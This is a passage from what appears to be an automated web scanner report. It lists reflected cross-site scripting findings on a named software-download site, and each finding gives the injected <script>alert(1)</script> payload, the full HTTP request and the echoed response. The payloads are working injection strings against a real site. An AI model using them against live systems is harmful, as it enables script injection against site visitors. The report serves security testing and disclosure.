HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8bd"><script>alert(1)</script>2073222b13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:24:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d668a"><script>alert(1)</script>fda2f2d8370 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:24:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370"/> ...[SNIP]...
1.242. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b318"><script>alert(1)</script>59af2c6b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6632"><script>alert(1)</script>c0725bae4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:22:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583a5"><script>alert(1)</script>95c1c196d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:23:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60095
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99"/> ...[SNIP]...
1.245. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a2"><script>alert(1)</script>f39f418527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:19:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e02"><script>alert(1)</script>f78bbafec09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:18:41 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6727"><script>alert(1)</script>351fce78751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:19:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751"/> ...[SNIP]...
1.248. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70863"><script>alert(1)</script>1a306d3759b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:16:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479d7"><script>alert(1)</script>109565655ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:19:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edda"><script>alert(1)</script>53ca7435637 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637"/> ...[SNIP]...
1.251. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540c"><script>alert(1)</script>1b11e322301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:17:31 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaf8"><script>alert(1)</script>29f62c52533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:25:02 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef19c"><script>alert(1)</script>53099d9c0ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:25:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac"/> ...[SNIP]...
1.254. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>1d30e1ca09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:30 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55234
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7c1"><script>alert(1)</script>cb83eacf673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:20:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f68"><script>alert(1)</script>c04ad26948f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f"/> ...[SNIP]...
1.257. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef3"><script>alert(1)</script>3ee45597a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 57549
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14448"><script>alert(1)</script>41f24c0c9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:23:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ff1"><script>alert(1)</script>4d559d8a948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:24:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948"/> ...[SNIP]...
1.260. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
